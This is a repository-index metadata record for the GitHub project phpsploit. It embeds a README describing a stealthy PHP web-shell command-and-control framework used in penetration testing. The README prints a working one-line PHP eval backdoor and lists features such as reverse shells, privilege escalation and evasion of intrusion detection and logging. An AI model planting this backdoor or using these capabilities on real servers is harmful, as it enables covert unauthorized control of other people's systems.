{"id":13510871,"url":"https://github.com/nil0x42/phpsploit","last_synced_at":"2025-05-15T04:07:06.729Z","repository":{"id":17265114,"uuid":"20034746","full_name":"nil0x42/phpsploit","owner":"nil0x42","description":"Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor","archived":false,"fork":false,"pushed_at":"2024-05-06T13:49:14.000Z","size":3474,"stargazers_count":2325,"open_issues_count":26,"forks_count":452,"subscribers_count":104,"default_branch":"master","last_synced_at":"2025-04-14T05:56:19.930Z","etag":null,"topics":["advanced-persistent-threat","backdoor","blackhat","c2","command-and-control","hacking","hacking-framework","hacktool","persistence","php-backdoor","php-webshell","php-webshell-backdoor","post-exploitation","privilege-escalation","redteam","stealth","web-hacking","webshell"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nil0x42.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"nil0x42","custom":["exdemia.com/donate-bitcoin","paypal.me/nil0x42"]}},"created_at":"2014-05-21T19:43:03.000Z","updated_at":"2025-04-12T13:29:45.000Z","dependencies_parsed_at":"2024-01-19T01:04:12.358Z","dependency_job_id":"e8f60ab3-e1b7-4a1f-8a0c-928f3af052eb","html_url":"https://github.com/nil0x42/phpsploit","commit_stats":null,"previous_names":[],"tags_count":10,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nil0x42%2Fphpsploit
","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nil0x42%2Fphpsploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nil0x42%2Fphpsploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nil0x42%2Fphpsploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nil0x42","download_url":"https://codeload.github.com/nil0x42/phpsploit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254270646,"owners_count":22042859,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["advanced-persistent-threat","backdoor","blackhat","c2","command-and-control","hacking","hacking-framework","hacktool","persistence","php-backdoor","php-webshell","php-webshell-backdoor","post-exploitation","privilege-escalation","redteam","stealth","web-hacking","webshell"],"created_at":"2024-08-01T02:01:57.295Z","updated_at":"2025-05-15T04:07:01.717Z","avatar_url":"https://github.com/nil0x42.png","language":"Python","readme":"\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://github.com/nil0x42/phpsploit\" alt=\"master\"\u003e\n    \u003cimg src=\"data/img/logo.png\" alt=\"Master\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n\u003ch3 align=\"center\"\u003e\n    Full-featured C2 framework which silently persists on \u003cbr\u003ewebserver via polymorphic PHP oneliner\n    \u003ca 
href=\"https://twitter.com/intent/tweet?text=PhpSploit%2C%20Full-featured%20C2%20framework%20which%20silently%20persists%20on%20webserver%20via%20polymorphic%20PHP%20oneliner%20-%20by%20@nil0x42\u0026url=https://github.com/nil0x42/phpsploit\"\u003e\n      \u003cimg src=\"https://img.shields.io/twitter/url?label=tweet\u0026logo=twitter\u0026style=social\u0026url=http%3A%2F%2F0\" alt=\"tweet\"\u003e\n    \u003c/a\u003e\n\u003c/h3\u003e\n\u003cbr\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://github.com/nil0x42/phpsploit/actions/workflows/unit-tests.yml?query=branch%3Amaster\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/actions/workflow/status/nil0x42/phpsploit/unit-tests.yml?label=tests\u0026logo=githubactions\" alt=\"Unit Tests workflow\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/nil0x42/phpsploit/network/dependencies#requirements.txt\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/dependabot-ok-aaf?logo=dependabot\u0026logoColor=aaf\" alt=\"Dependabot status\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://app.codacy.com/gh/nil0x42/phpsploit/dashboard\"\u003e\n    \u003cimg src=\"https://img.shields.io/codacy/grade/f8514058aec04ad98727c79701bc042a?logo=codacy\u0026logoColor=green\" alt=\"codacy code quality\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/nil0x42/phpsploit/actions/workflows/codeql-analysis.yml?query=branch%3Amaster\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/actions/workflow/status/nil0x42/phpsploit/codeql-analysis.yml?label=codeql\u0026logo=lgtm\u0026logoColor=ff0\u0026color=af8\" alt=\"CodeQL workflow\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://codecov.io/gh/nil0x42/phpsploit\"\u003e\n    \u003cimg src=\"https://img.shields.io/codecov/c/github/nil0x42/phpsploit?color=orange\u0026label=coverage\u0026logo=codecov\" alt=\"codecov coverage\"\u003e\n  \u003c/a\u003e\n  \u003ca 
href=\"https://codeclimate.com/github/nil0x42/phpsploit/maintainability\"\u003e\n    \u003cimg src=\"https://api.codeclimate.com/v1/badges/6986200c1729b4a70a40/maintainability\" alt=\"codeclimate maintainability\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://github.com/enaqx/awesome-pentest\"\u003e\n    \u003cimg src=\"https://awesome.re/mentioned-badge.svg\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://www.kali.org/tools/phpsploit/\"\u003e\n    \u003cimg src=\"https://img.shields.io/static/v1?label=Kali%20Linux\u0026message=packaged\u0026color=red\u0026logo=kalilinux\u0026logoColor=ff0\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://www.blackarch.org/webapp.html\"\u003e\n    \u003cimg src=\"https://img.shields.io/static/v1?label=BlackArch\u0026message=packaged\u0026color=red\u0026logo=archlinux\u0026logoColor=006\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://twitter.com/intent/follow?screen_name=nil0x42\" target=\"_blank\"\u003e\n    \u003cimg src=\"https://img.shields.io/twitter/follow/nil0x42.svg?logo=twitter\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n\u003cdiv align=\"center\"\u003e\n  \u003csub\u003e\n    Created by\n    \u003ca href=\"https://twitter.com/nil0x42\"\u003enil0x42\u003c/a\u003e and\n    \u003ca href=\"https://github.com/nil0x42/phpsploit#contributors\"\u003econtributors\u003c/a\u003e\n  \u003c/sub\u003e\n\u003c/div\u003e\n\n\u003cbr\u003e\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"data/img/demo.png\"\u003e\n\u003c/p\u003e\n\n\n#### Overview\n\nThe obfuscated communication is accomplished using HTTP headers under\nstandard client requests and web server's relative responses, tunneled\nthrough a tiny **polymorphic backdoor**:\n\n```php\n\u003c?php @eval($_SERVER['HTTP_PHPSPL01T']); ?\u003e\n```\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n#### Quick 
Start\n\n```sh\ngit clone https://github.com/nil0x42/phpsploit\ncd phpsploit/\npip3 install -r requirements.txt\n./phpsploit --interactive --eval \"help help\"\n```\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n#### Features\n\n-   **Efficient**: More than 20 plugins to automate privilege-escalation tasks\n    -   Run commands and browse filesystem, bypassing PHP security restrictions\n    -   Upload/Download files between client and target\n    -   Edit remote files through local text editor\n    -   Run SQL console on target system\n    -   Spawn reverse TCP shells\n\n-   **Stealth**: The framework is made by paranoids, for paranoids\n    -   Nearly invisible to log analysis and NIDS signature detection\n    -   Safe-mode and common _PHP security restrictions bypass_\n    -   Communications are hidden in HTTP Headers\n    -   Loaded payloads are obfuscated to _bypass NIDS_\n    -   http/https/socks4/socks5 **Proxy support**\n\n-   **Convenient**: A robust interface with many crucial features\n    -   Detailed help for any option (`help` command)\n    -   _Cross-platform_ on both client and server.\n    -   CLI supports auto-completion \u0026 multi-command\n    -   Session saving/loading feature \u0026 persistent history\n    -   Multi-request support for large payloads (such as uploads)\n    -   Provides a powerful, highly configurable settings engine\n    -   Each setting, such as user-agent, has a _polymorphic mode_\n    -   Customisable environment variables for plugin interaction\n    -   Provides a complete plugin development API\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n#### Supported platforms (as attacker):\n\n-   GNU/Linux\n-   Mac OS X\n\n#### Supported platforms (as target):\n\n-   GNU/Linux\n-   BSD-like\n-   Mac OS X\n-   Windows NT\n\n## Contributors\n\n\u003c!-- [![](https://contrib.rocks/image?repo=nil0x42/phpsploit)](https://github.com/nil0x42/phpsploit/graphs/contributors) 
--\u003e\n\u003c!-- \u003cdetails\u003e --\u003e\n\u003c!-- \u003csummary\u003e\u003cb\u003e:trophy: All contributors\u003c/b\u003e\u003c/summary\u003e --\u003e\nThanks goes to these wonderful people:\n\u003c!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section --\u003e\n\u003c!-- prettier-ignore-start --\u003e\n\u003c!-- markdownlint-disable --\u003e\n\u003ctable\u003e\n  \u003ctr\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://exdemia.com\"\u003e\u003cimg src=\"https://avatars1.githubusercontent.com/u/3504393?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003enil0x42\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/commits?author=nil0x42\" title=\"Code\"\u003e💻\u003c/a\u003e \u003ca href=\"#infra-nil0x42\" title=\"Infrastructure (Hosting, Build-Tools, etc)\"\u003e🚇\u003c/a\u003e \u003ca href=\"#plugin-nil0x42\" title=\"Plugin/utility libraries\"\u003e🔌\u003c/a\u003e \u003ca href=\"https://github.com/nil0x42/phpsploit/commits?author=nil0x42\" title=\"Tests\"\u003e⚠️\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://github.com/shiney-wh\"\u003e\u003cimg src=\"https://avatars1.githubusercontent.com/u/20907184?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eshiney-wh\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/commits?author=shiney-wh\" title=\"Code\"\u003e💻\u003c/a\u003e \u003ca href=\"#plugin-shiney-wh\" title=\"Plugin/utility libraries\"\u003e🔌\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"http://wapiflapi.github.io\"\u003e\u003cimg src=\"https://avatars3.githubusercontent.com/u/1619783?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eWannes Rombouts\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca 
href=\"https://github.com/nil0x42/phpsploit/commits?author=wapiflapi\" title=\"Code\"\u003e💻\u003c/a\u003e \u003ca href=\"#maintenance-wapiflapi\" title=\"Maintenance\"\u003e🚧\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"http://yurilz.com\"\u003e\u003cimg src=\"https://avatars1.githubusercontent.com/u/6031769?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eAmine Ben Asker\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/commits?author=yurilaaziz\" title=\"Code\"\u003e💻\u003c/a\u003e \u003ca href=\"#maintenance-yurilaaziz\" title=\"Maintenance\"\u003e🚧\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"http://twitter.com/jnazario\"\u003e\u003cimg src=\"https://avatars1.githubusercontent.com/u/5619153?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003ejose nazario\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/commits?author=paralax\" title=\"Documentation\"\u003e📖\u003c/a\u003e \u003ca href=\"https://github.com/nil0x42/phpsploit/issues?q=author%3Aparalax\" title=\"Bug reports\"\u003e🐛\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"http://wikisecure.net\"\u003e\u003cimg src=\"https://avatars3.githubusercontent.com/u/156915?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eSujit Ghosal\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"#blog-sujit\" title=\"Blogposts\"\u003e📝\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://github.com/sohelzerdoumi\"\u003e\u003cimg src=\"https://avatars3.githubusercontent.com/u/3418725?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eZerdoumi\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca 
href=\"https://github.com/nil0x42/phpsploit/issues?q=author%3Asohelzerdoumi\" title=\"Bug reports\"\u003e🐛\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://github.com/tristandostaler\"\u003e\u003cimg src=\"https://avatars3.githubusercontent.com/u/5489330?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003etristandostaler\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/issues?q=author%3Atristandostaler\" title=\"Bug reports\"\u003e🐛\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://github.com/rohantarai\"\u003e\u003cimg src=\"https://avatars3.githubusercontent.com/u/16543074?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eRohan Tarai\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/issues?q=author%3Arohantarai\" title=\"Bug reports\"\u003e🐛\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://triop.se\"\u003e\u003cimg src=\"https://avatars1.githubusercontent.com/u/190150?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eJonas Lejon\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"#blog-jonaslejon\" title=\"Blogposts\"\u003e📝\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n\u003c/table\u003e\n\n\u003c!-- markdownlint-enable --\u003e\n\u003c!-- prettier-ignore-end --\u003e\n\u003c!-- ALL-CONTRIBUTORS-LIST:END --\u003e\nThis project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. 
Contributions of any kind welcome\n\n\u003c!-- \u003c/details\u003e --\u003e\n","funding_links":["https://github.com/sponsors/nil0x42","exdemia.com/donate-bitcoin","paypal.me/nil0x42"],"categories":["Tools","Web","Python","\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing","Web Exploitation","Uncategorized","Python (1887)","backdoor"],"sub_categories":["Binary files examination and editing","Webshell","Scanning / Pentesting","\u003ca id=\"41ae40ed61ab2b61f2971fea3ec26e7c\"\u003e\u003c/a\u003e漏洞利用","Web shells and C2 frameworks","Uncategorized","Web Shells / C2 Frameworks"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnil0x42%2Fphpsploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnil0x42%2Fphpsploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnil0x42%2Fphpsploit/lists"}